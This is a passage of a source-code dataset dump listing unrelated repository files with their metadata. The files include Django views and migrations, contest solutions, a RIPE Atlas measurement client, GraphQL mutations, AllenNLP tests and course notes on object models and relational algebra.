name='photocategory',
table=None,
),
migrations.AlterModelTable(
name='photogroup',
table=None,
),
]
| [
"ltfred@163.com"
] | ltfred@163.com |
848aacbb7fce373419b775fcebe7c949120adf66 | fdbd22dfdb9ae06896e24aa83cfa86aa1299efba | /The-Python-Workbook-Solutions/Section 4/Ex93.py | aad774859aec88bae2f1c88f2d5daccd3d0e353a | [] | no_license | CodedQuen/The-Python-Workbook-A-Brief-Introduction | 6450a16d8dbcf721885c1dc98907e3e16ac465a7 | 6c9f134223a343d5b8b9c529cd613c18dbf0f59d | refs/heads/master | 2022-06-21T06:37:33.459795 | 2020-05-05T10:48:50 | 2020-05-05T10:48:50 | 261,429,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 9 17:15:08 2019
@author: meyerhof
"""
def nextPrime(n):
while True:
if n < 0:
print("www")
print("El número no es un entero positivo")
n = float(input("Ingrese un número entero positivo: "))
elif n != int(n):
print("El número no es un entero positivo")
n = float(input("Ingrese un número entero positivo: "))
else:
break
n = int(n)
n = n+1
while True:
for i in range(2,n):
if n%i == 0:
n = n+1
break
else:
print("El primero primo más grande que el número ingresado es: ", n)
break
def main():
number = float(input("Ingrese un número entero positivo: "))
nextPrime(number)
main()
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
ea2648e09c6561379f3a1bcdaaf3dd4eb2260bb4 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/leet_20200615171650.py | 0fb9aa27f1496d4a51a52e9e583dbf751915e04f | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | # how a binary tree works is the smaller numbers are
# on the left then the bigger ones are on the right
# returning the node also returns the children which is what
# you want
def search(root,val):
if root is None:
return []
elif root.val == val:
print(root)
return root
else:
if val > root.val :
search(root.right,val)
else:
search(root.left,val)
print(search([4,2,1,7,3],5)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
7aa0aeedc4f2a54ec5dbebcd7de1f5fe1fe6536e | b97729ad528be0cd211c1fe75bd43cca5ef65d2e | /api_test.py | 80ec608952d0999cab383dfa466a043be01245ad | [
"MIT"
] | permissive | chakki-works/CoARiJ-search | 04781459892da918f3dc902b9f6e91c036232fa0 | 9b2d3b4a1a40d45152effaab3b2b5ea9c5ed8cd3 | refs/heads/master | 2022-12-22T09:37:09.167277 | 2019-12-25T08:34:36 | 2019-12-25T08:34:36 | 227,003,986 | 0 | 0 | MIT | 2022-12-11T16:37:37 | 2019-12-10T01:40:03 | Python | UTF-8 | Python | false | false | 225 | py | import requests
import numpy as np
url = "http://127.0.0.1:8080/vectorize"
params = {"q": "僕の名前はみつりん", "lang": "jp"}
resp = requests.get(url=url, params=params).json()
print(resp["embedding"])
print(params)
| [
"icoxfog417@yahoo.co.jp"
] | icoxfog417@yahoo.co.jp |
bd24faf52a88f81bf4bbe7fd5c2eb461d025b3cb | 0bdaf322a5be633aa70827ae87d50f86c49c7a76 | /thread_sample/threads.py | adbac40eefb34a51fbe6a264de920168c227ce14 | [] | no_license | jasonwee/alertThreshold | 714cff391adf5b2052d61b29e13ac35e63662e89 | 2a67e0a2dff9b57474f0cdb1f55bc8512386c81d | refs/heads/master | 2022-12-10T23:40:04.409024 | 2019-12-19T08:45:57 | 2019-12-19T08:45:57 | 198,440,856 | 0 | 0 | null | 2022-12-08T05:55:11 | 2019-07-23T13:52:29 | Python | UTF-8 | Python | false | false | 1,353 | py | from Queue import Queue
from threading import Thread
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.start()
def run(self):
while True:
func, args, kargs = self.tasks.get()
try:
func(*args, **kargs)
except Exception, e:
print e
finally:
self.tasks.task_done()
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads):
self.tasks = Queue(num_threads)
for _ in range(num_threads):
Worker(self.tasks)
def add_task(self, func, *args, **kargs):
"""Add a task to the queue"""
self.tasks.put((func, args, kargs))
def wait_completion(self):
"""Wait for completion of all the tasks in the queue"""
self.tasks.join()
if __name__ == '__main__':
from random import randrange
from time import sleep
delays = [randrange(1, 10) for i in range(100)]
def wait_delay(d):
print 'sleeping for (%d)sec' % d
sleep(d)
pool = ThreadPool(20)
for i, d in enumerate(delays):
pool.add_task(wait_delay, d)
pool.wait_completion()
| [
"peichieh@gmail.com"
] | peichieh@gmail.com |
4aa40243fee1ae9b616616912857ce1bd8a165ab | 5792baf9e18ad91816cc42f4725b099a4dce7b7b | /Pluralsight/Python Getting Started/lambda.py | d1d354e4a536026854064d2c2ec249fcdeea8034 | [] | no_license | deepakorantak/Python | 83b6782db0b5428d47fbc29193076e8ed5f5e285 | 9781133ce5a5c6f87efb5d4aa132a63ba1290f76 | refs/heads/master | 2020-03-23T19:55:30.075700 | 2019-02-19T06:24:42 | 2019-02-19T06:24:42 | 142,010,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | add = lambda x,y:x+y
def calculate(function,x,y):
return function(x,y)
def print_result(item):
for i in item:
yield i
res = 1
list_res = []
for i in range(1,6):
list_res.append(res)
res = calculate(add,res,i)
| [
"DeepaNKorantak@Gmail.com"
] | DeepaNKorantak@Gmail.com |
dd4bff3240df7045db9c77a29448844c22d0fbcd | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2652486_0/Python/icedingo/C.py | 256f90f72e67faf11853c5b2d01520146d3c82d0 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,870 | py | import itertools
raw_input()
R, N, M, K = map(int, raw_input().split())
numbers = range(2, M+1)
products = {}
for i in xrange(N):
i += 1
for comb in itertools.combinations_with_replacement(numbers, i):
prod = reduce(lambda x,y : x*y, comb)
if prod not in products:
products[prod] = []
products[prod].append(''.join(map(str, comb)))
print 'Case #1:'
for r in xrange(R):
numset = map(int, raw_input().split())
possible = []
must = []
for num in numset:
if num in products:
blah = products[num]
if len(blah) == 1:
must += blah
else:
possible += blah
must.sort(key=lambda x:-len(x))
possible.sort(key=len)
result = None
for maybe in must:
if len(maybe) == N:
result = maybe
break
done = len(maybe)
for rest in must:
if len(rest) == N - done:
result = maybe + rest
break
for rest in possible:
if len(rest) == N - done:
result = maybe + rest
break
else:
counts = {}
for rest in possible:
if rest not in counts:
counts[rest] = 0
counts[rest] += 1
count_list = sorted(counts.items(), key=lambda x:x[1])
if count_list:
result = count_list[0][0]
else:
result = '222'
done = False
if len(result) == N:
done = True
if not done:
for thing in count_list:
if len(result) + len(thing[0]) == N:
result = result + thing[0]
done = True
break
else:
result = '222'
if result is None:
result = '222'
print result
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
59da0441dfdae546f6978a77dfa30809a9f016a4 | 3b604fe8f03f25859991cdab37804bcda51a4f18 | /dublyou/apps/competitions/migrations/0021_auto_20170208_1327.py | c209926f116eddd90b1a739362c65439c98c3d97 | [] | no_license | dublyou/matchup-games | e6238cbca7c30c6d4b4ddd161b84dfd5cc1bbacd | 07b2db2e7d52ac6590ab55a1a05e6076d8c9d680 | refs/heads/master | 2020-03-11T11:10:10.506719 | 2018-04-17T20:41:30 | 2018-04-17T20:41:30 | 129,956,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-02-08 19:27
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('competitions', '0020_auto_20170208_1326'),
]
operations = [
migrations.AlterUniqueTogether(
name='matchupcompetitor',
unique_together=set([('matchup', 'competitor')]),
),
]
| [
"jgriff@Calebs-MacBook-Pro.local"
] | jgriff@Calebs-MacBook-Pro.local |
38858d47bfbc0f344c5abb3b33b16dce0d4a44ba | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/AppStreamGlib/BundleClass.py | fff38c1582b8c4b940d7ee23fbf282772b0e6321 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 5,784 | py | # encoding: utf-8
# module gi.repository.AppStreamGlib
# from /usr/lib64/girepository-1.0/AppStreamGlib-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gobject as __gobject
class BundleClass(__gi.Struct):
"""
:Constructors:
::
BundleClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved3 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved4 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved5 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved6 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved7 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved8 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(BundleClass), '__module__': 'gi.repository.AppStreamGlib', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'BundleClass' objects>, '__weakref__': <attribute '__weakref__' of 'BundleClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f274165ff40>, '_as_reserved1': <property object at 0x7f2741660090>, '_as_reserved2': <property object at 0x7f2741660180>, '_as_reserved3': <property object at 0x7f2741660270>, '_as_reserved4': <property object at 0x7f2741660360>, '_as_reserved5': <property object at 0x7f2741660450>, '_as_reserved6': <property object at 0x7f2741660540>, '_as_reserved7': <property object at 0x7f2741660630>, '_as_reserved8': <property object at 0x7f2741660720>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(BundleClass)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
31aa1f2ab88183a3c6820e7325e5564f79a2bf2a | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/numberMumbler/pancakes.py | 9e56f0b9a08a2b46aec3e868ba27265b17453014 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,521 | py | #!/usr/bin/env python
import sys
__outputTemplate = 'Case #{0}: {1}\n'
def flip(pancakes):
return [not p for p in reversed(pancakes)]
def flipAfter(stack, i):
return flip(stack[:i+1]) + stack[i+1:]
def flipPoint(stack):
for i in range(len(stack) - 1):
if stack[i] != stack[i+1]:
return i
return len(stack) - 1
def minimumFlips(stack, verbose=False):
maxFlips = len(stack)
flips = 0
while flips < maxFlips and not all(stack):
flips += 1
if verbose:
print('start stack: {}'.format(stack))
i = flipPoint(stack)
if verbose:
print('flip at: {}'.format(i))
if i >= 0:
stack = flipAfter(stack, i)
if verbose:
print('end stack: {}'.format(stack))
return flips
def stringToStack(s):
return [p == '+' for p in s.strip()]
def action(inFile, outFile):
case = 0
t = int(inFile.readline())
for line in inFile.readlines():
case += 1
assert case <= t
x = stringToStack(line)
result = minimumFlips(x)
outFile.write(__outputTemplate.format(case, result))
def main():
"""
command line arguments are:
input path
output path (will overwrite existing)
"""
assert len(sys.argv) == 3
inputPath, outputPath = sys.argv[1:3]
with open(inputPath, 'r') as inFile:
with open(outputPath, 'w+') as outFile:
action(inFile, outFile)
if __name__ == '__main__':
main()
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
d8f9c8c7ac57c4d2f0c1d2537727eab4815a6813 | 5d5a2511fd5f408437265a3bd94529730f4f357e | /latency/lib/atlasclient.py | 7b80a080a13f1efff3f8b017861849e903cb19d4 | [] | no_license | wwwiretap/atlas | 50f89006c6adec146c8e6039531610ba97e34185 | 409daba5e08c1b089580c81531fdf848376e1e90 | refs/heads/master | 2022-04-20T16:42:12.348475 | 2020-04-14T14:25:11 | 2020-04-14T14:25:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,280 | py | from datetime import datetime
import time
from ripe.atlas.cousteau import (
AtlasSource,
AtlasStream,
AtlasCreateRequest,
AtlasLatestRequest,
# Measurement,
Ping
)
import urllib.request
from urllib.error import HTTPError, URLError
import json
class AtlasClient:
def __init__(self, args, log, results_manager):
self._args = args
self._log = log
self._results_manager = results_manager
def _create_measurement_impl(self, target_probe):
args = self._args
log = self._log
probe = target_probe
if 'address_v4' not in probe:
log.error('probe has no ipv4 addr')
return None
target_id = probe['id']
target_ip = probe['address_v4']
log.notice('Creating measurement to probe', target_id, target_ip)
desc = '{} {} to {}'.format(args.test_name_prefix, args.src_probe, target_id)
ping = Ping(af=4, target=target_ip, description=desc)
source = AtlasSource(type='probes', value='{}'.format(args.src_probe),
requested=1)
req = AtlasCreateRequest(
start_time=datetime.utcnow(),
key=args.api,
measurements=[ping],
sources=[source],
is_oneoff=True
)
is_success, resp = req.create()
if not is_success:
log.warn('Error creating measurement:', str(resp))
return None
else:
msm_id = resp['measurements'][0]
return msm_id
log(is_success, resp)
def _get_measurement_status(self, msm_id):
assert msm_id
req = AtlasLatestRequest(msm_id=msm_id)
is_success, results = req.create()
if not is_success:
self._log.warn('Fetching status of', msm_id, 'was not successful.',
results)
return None
return results
def do(self, item):
rm = self._results_manager
log = self._log
had_to_create_msm = False
probe = item['probe']
if 'id' not in probe:
log.error('probe without ID???')
return None
if 'address_v4' not in probe:
log.error('probe without ipv4 address???')
return None
if not rm.have_measurement_for_probe(probe['id']):
log('No measurement for probe', probe['id'], 'yet')
msm_id = self._create_measurement(probe)
had_to_create_msm = True
if not rm.have_measurement_for_probe(probe['id']):
log.warn('Unable to make measurement to probe', probe['id'])
return
msm_id = int(rm.get_measurement_for_probe(probe['id']))
log.info('Have msm', msm_id, 'for probe', probe['id'])
if not rm.have_result_for_probe(probe['id']):
log.debug('Fetching result for msm', msm_id)
self._wait_for_result(probe, msm_id)
if not rm.have_result_for_probe(probe['id']):
log.warn('Unable to fetch result for probe', probe['id'])
return
log.notice('Have result for msm', msm_id)
if had_to_create_msm:
self._wait_for_measurement_to_complete(msm_id)
def _create_measurement(self, probe):
self._log.debug('Called with probe', probe['id'])
args = self._args
log = self._log
prb_id = probe['id']
for _ in range(0, self._args.msm_attempts):
msm_id = self._create_measurement_impl(probe)
if not msm_id:
time.sleep(60)
continue
self._results_manager.recv_measurement(prb_id, msm_id)
return msm_id
return None
def _wait_for_result(self, probe, msm_id):
args = self._args
log = self._log
prb_id = probe['id']
result = None
timeout = time.time() + args.msm_result_timeout
while time.time() < timeout:
result = self._get_measurement_status(msm_id)
if result: break
log.debug('Waiting for result for msm', msm_id, '...')
time.sleep(10)
if not result:
log.warn('Didn\'t get a result')
else:
log.debug('Got result for msm', msm_id)
self._results_manager.recv_result(prb_id, msm_id, result)
return result
def _wait_for_measurement_to_complete(self, msm_id):
log = self._log
atlas_url = 'https://atlas.ripe.net/api/v2/measurements/{}/'.format(msm_id)
while True:
try: req = urllib.request.urlopen(atlas_url)
except HTTPError:
log.warn('Got an HTTP error trying to fetch msm', msm_id,
'so we aren\'t going to wait for it to finish')
break
except URLError as e:
log.warn(e, 'but will try again to wait until msm is stopped')
time.sleep(10)
else:
j = json.loads(req.read().decode('utf-8'))
if j['stop_time']:
log.info('msm', msm_id, 'is considered done')
break
log.debug('Still waiting on msm', msm_id, 'to be done ...')
time.sleep(30)
return
| [
"sirmatt@ksu.edu"
] | sirmatt@ksu.edu |
a7fba9ff5e2ef35f0c5b1435cd717b762c34ce13 | 622183f2069a84508e87d0ceebfd203d0ec9332a | /notes/07-03.py | 60681b0e07c2f2ae5b0f36b0649ae51a8b70f3de | [] | no_license | kasrasadeghi/cs373 | f4ff92fa8c472242fe9df10f6d5a022cba6fcdd9 | 7036f22db3e2830bf79395a3aef3c7bed4e58887 | refs/heads/master | 2021-01-01T18:23:57.473050 | 2017-07-25T15:58:55 | 2017-07-25T15:58:55 | 98,325,040 | 0 | 0 | null | 2017-07-25T15:59:32 | 2017-07-25T15:59:32 | null | UTF-8 | Python | false | false | 2,077 | py | # -----------
# Mon, 3 Jul
# -----------
"""
Java has 4 access directives
public
protected: descendents and package
private
nothing: package
class A {
private static int _ci;
private int _i;
public A (...) {
...}}
class T {
public static void main (...) {
s.o.p(A._i); // not ok
s.o.p(A._ci);
x = new A(...);
s.o.p(x._i);
s.o.p(x._ci); // yes, but odd
Java has a closed object model
instances have the same footprint over time
different instances have the same footpring
Python has an open object model
instances don't have the same footprint over time
different instances don't have the same footpring
"""
class A :
def __init__ (self) :
self.velocity = 2
x = A()
print(x.velocity) # 2
x.velocityy = 3
a = [A(...), A(...), A(...)]
m = map(A.im, a)
"""
relational algebra is an algebra
algebra
set of elements
set of operations
integer
-3, 2, 5, 0, ...
+, -, /, *, ...
are algebras closed or open
integers over addition: closed
integers over multiplication: closed
integers over division: open
relational algebra
relations, tuples, tables with rows
select, project, join (several kinds)
movie table
title year director genre
shane 1953 george stevens western
star wars 1977 george lucas western
select
relation
unary predicate (unary function that returns a bool)
"""
select (movie, lambda r : year > 1970)
x = [["shane", 1953, "george stevens", "western"]
["star wars", 1977, "george lucas", "western"]]
def select (iterable, callable) :
for i in iterable :
if callable(i) :
yield i
def select (iterable, callable) :
return (i for i in iterable if callable(i))
def select (iterable, callable) :
return filter(callable, iterable)
# ---------
# Questions
# ---------
"""
What is a closed/open object model? Which language has which?
What is a closed/open algebra?
What data structure in Python can mimic a relation?
What is select()?
What is project()?
"""
| [
"downing@cs.utexas.edu"
] | downing@cs.utexas.edu |
5d2b249842e4c8208f1359651391dcf5dffdf187 | 41063557c9a004ca49077c6042bba3cb8521e853 | /jobsapp/graphql/sub_mutations.py | 9de270f6dd14ce1679d3bb8056d116c405d2c5aa | [
"MIT"
] | permissive | manjurulhoque/django-job-portal | d71c17741cdb69fb7df49e20533a0c2e1e8ed2f1 | 01f2b7f77511e99cd5e6286ffa1abf36688f486c | refs/heads/master | 2023-08-03T01:01:52.878771 | 2023-07-24T07:40:06 | 2023-07-24T10:46:59 | 180,424,218 | 497 | 211 | MIT | 2023-09-02T10:13:37 | 2019-04-09T18:12:52 | Python | UTF-8 | Python | false | false | 1,722 | py | import graphene
from jobsapp.graphql.graphql_mixins import (
DynamicArgsMixin,
MutationMixin,
CreateNewJobMixin,
UpdateJobMixin,
SingleObjectMixin,
)
from jobsapp.graphql.input_types import TagInput
from jobsapp.graphql.permissions import IsAuthenticated, IsEmployer
from graphene.types import Int
from jobsapp.graphql.types import JobGQLType
from jobsapp.models import Job
class CreateNewJob(MutationMixin, DynamicArgsMixin, CreateNewJobMixin, graphene.Mutation):
__doc__ = CreateNewJobMixin.__doc__
_required_args = {
"title": "String",
"description": "String",
"location": "String",
"type": "String",
"category": "String",
"last_date": "String",
"company_name": "String",
"company_description": "String",
"website": "String",
"salary": "Int",
}
permission_classes = [IsAuthenticated, IsEmployer]
class Arguments:
tags = graphene.List(Int, required=True)
class UpdateJob(MutationMixin, DynamicArgsMixin, SingleObjectMixin, UpdateJobMixin, graphene.Mutation):
job = graphene.Field(JobGQLType)
__doc__ = UpdateJobMixin.__doc__
_required_args = {"pk": "ID"}
_args = {
"title": "String",
"description": "String",
"location": "String",
"type": "String",
"category": "String",
"last_date": "String",
"company_name": "String",
"company_description": "String",
"website": "String",
"salary": "Int",
}
class Arguments:
tags = graphene.List(Int, required=False)
permission_classes = [IsAuthenticated, IsEmployer]
model = Job
check_object_level_permission: bool = False
| [
"rumimanzurulhoque@gmail.com"
] | rumimanzurulhoque@gmail.com |
9f426550c3767ef67dac51e54f6d0d7937baeae8 | e2e188297b0ef47f0e7e935290f3b7a175376f8f | /contact_form/views.py | becd3867b41ead2c81f7b00bb2a8d6edaa837672 | [] | no_license | shubham1560/contact-us-backend | 77b615021f0db2a48444424a654cf3c61522c7d8 | c7ef2d3024ab3f3b6f077648d6f6f5357f01eebc | refs/heads/master | 2022-12-30T13:05:00.950702 | 2020-10-02T19:47:19 | 2020-10-02T19:47:19 | 296,075,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,041 | py | from django_countries import Countries
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from rest_framework import serializers, status
from .models import ContactForm
from rest_framework.response import Response
from .services import insert_contact_data, get_related_forms_records, get_preference_array, change_field_value,\
get_contact_form_count, delete_mass_contact_form
from domain_preference.models import DomainPreference
# Create your views here.
class SerializableCountryField(serializers.ChoiceField):
def __init__(self, **kwargs):
super(SerializableCountryField, self).__init__(choices=Countries())
def to_representation(self, value):
if value in ('', None):
return '' # normally here it would return value. which is Country(u'') and not serialiable
return super(SerializableCountryField, self).to_representation(value)
class ContactUsListView(APIView):
permission_classes = (IsAuthenticated, )
country = SerializableCountryField(allow_blank=True)
class ContactUsFormSerializer(serializers.ModelSerializer):
class Meta:
model = ContactForm
fields = ('id', 'first_name', 'last_name',
'name', 'email', 'subject', 'message', 'anything_else',
'phone_number', 'sys_created_on', 'important', 'read', 'starred')
class DomainPreferenceSerializer(serializers.ModelSerializer):
class Meta:
model = DomainPreference
fields = ('id', 'first_name', 'last_name', 'name', 'email', 'subject',
'message', 'anything_else', 'phone_number', 'window')
def get(self, request, start, message_type, format=None):
domain_preference = get_preference_array(request)
preference = self.DomainPreferenceSerializer(domain_preference, many=True)
# message_type can be all, important, start, read, unread
# breakpoint()
if preference.data:
end = start+preference.data[0]['window']
else:
end = 50
contacts_data = get_related_forms_records(request, start, end, message_type)
result = self.ContactUsFormSerializer(contacts_data, many=True)
row_count = get_contact_form_count(request, message_type)
# breakpoint()
response = {
"list": result.data,
"preference": preference.data,
"row_count": row_count
}
return Response(response, status=status.HTTP_200_OK)
# def post(self, request, format=None):
# insert_contact_data(request)
# return Response('Inserted data', status=status.HTTP_201_CREATED)
# # pass
class ContactUsPostView(APIView):
# permission_classes = (IsAuthenticated, )
country = SerializableCountryField(allow_blank=True)
class ContactUsFormSerializer(serializers.ModelSerializer):
class Meta:
model = ContactForm
fields = ('id', 'first_name', 'last_name',
'country', 'name', 'email', 'subject', 'message', 'anything_else',
'domain', 'domain_path')
def post(self, request, format=None):
# breakpoint()
in_domain = insert_contact_data(request)
if in_domain == "Default":
message = "Wrong api key, please check the key in dashboard!"
# status = status.
else:
message = "Successful integration"
return Response(message, status=status.HTTP_201_CREATED)
class ContactUsChangeView(APIView):
permission_classes = (IsAuthenticated, )
def post(self, request, format=None):
result = change_field_value(request)
return Response(result, status=status.HTTP_201_CREATED)
# pass
class ContactUsFormBulkDelete(APIView):
permission_classes = (IsAuthenticated, )
def post(self, request, format=None):
result = delete_mass_contact_form(request)
return Response(result, status=status.HTTP_200_OK)
| [
"shubhamsinha2050@gmail.com"
] | shubhamsinha2050@gmail.com |
d622a74280f26b8cdea5b8e0085fb5ccdde31172 | 234c46d1249c9209f268417a19018afc12e378b4 | /tests/data/instance_test.py | 73e85d9f649992b50ec46216aed782120454611e | [
"Apache-2.0"
] | permissive | allenai/allennlp | 1f4bcddcb6f5ce60c7ef03a9a3cd6a38bdb987cf | 80fb6061e568cb9d6ab5d45b661e86eb61b92c82 | refs/heads/main | 2023-07-07T11:43:33.781690 | 2022-11-22T00:42:46 | 2022-11-22T00:42:46 | 91,356,408 | 12,257 | 2,712 | Apache-2.0 | 2022-11-22T00:42:47 | 2017-05-15T15:52:41 | Python | UTF-8 | Python | false | false | 2,588 | py | import numpy
from allennlp.common.testing import AllenNlpTestCase
from allennlp.data import Instance
from allennlp.data.fields import TextField, LabelField, TensorField
from allennlp.data.token_indexers import PretrainedTransformerIndexer
from allennlp.data.tokenizers import Token
class TestInstance(AllenNlpTestCase):
def test_instance_implements_mutable_mapping(self):
words_field = TextField([Token("hello")], {})
label_field = LabelField(1, skip_indexing=True)
instance = Instance({"words": words_field, "labels": label_field})
assert instance["words"] == words_field
assert instance["labels"] == label_field
assert len(instance) == 2
keys = {k for k, v in instance.items()}
assert keys == {"words", "labels"}
values = [v for k, v in instance.items()]
assert words_field in values
assert label_field in values
def test_duplicate(self):
# Verify the `duplicate()` method works with a `PretrainedTransformerIndexer` in
# a `TextField`. See https://github.com/allenai/allennlp/issues/4270.
instance = Instance(
{
"words": TextField(
[Token("hello")], {"tokens": PretrainedTransformerIndexer("bert-base-uncased")}
)
}
)
other = instance.duplicate()
assert other == instance
# Adding new fields to the original instance should not effect the duplicate.
instance.add_field("labels", LabelField("some_label"))
assert "labels" not in other.fields
assert other != instance # sanity check on the '__eq__' method.
def test_human_readable_repr(self):
words_field = TextField([Token("hello")], {})
label_field = LabelField(1, skip_indexing=True)
instance1 = Instance({"words": words_field, "labels": label_field})
assert type(instance1.human_readable_dict()) is dict
assert instance1.human_readable_dict() == {"words": ["hello"], "labels": 1}
instance1_human_readable_dict = instance1.human_readable_dict()
array = TensorField(numpy.asarray([1.0, 1, 1]))
array_human_readable_dict = {
"shape": [3],
"element_mean": 1.0,
"element_std": 0,
"type": "float64",
}
instance2 = Instance({"words": words_field, "labels": label_field, "tensor": array})
instance1_human_readable_dict["tensor"] = array_human_readable_dict
assert instance1_human_readable_dict == instance2.human_readable_dict()
| [
"noreply@github.com"
] | allenai.noreply@github.com |
929a08ae553a84c21973df60cd0d91dc9e526d53 | 2bf43e862b432d44ba545beea4e67e3e086c1a1c | /nemo_text_processing/text_normalization/en/taggers/word.py | fa6a965aab2e4d802e2bfd8d001356c128d04cb5 | [
"Apache-2.0"
] | permissive | ericharper/NeMo | 719e933f6ffce1b27358bc21efe87cdf144db875 | f1825bc4b724b78c2d6ca392b616e8dc9a8cde04 | refs/heads/master | 2022-10-06T01:45:21.887856 | 2022-09-14T19:09:42 | 2022-09-14T19:09:42 | 259,380,135 | 1 | 0 | Apache-2.0 | 2022-09-20T18:01:57 | 2020-04-27T15:54:20 | Python | UTF-8 | Python | false | false | 3,999 | py | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
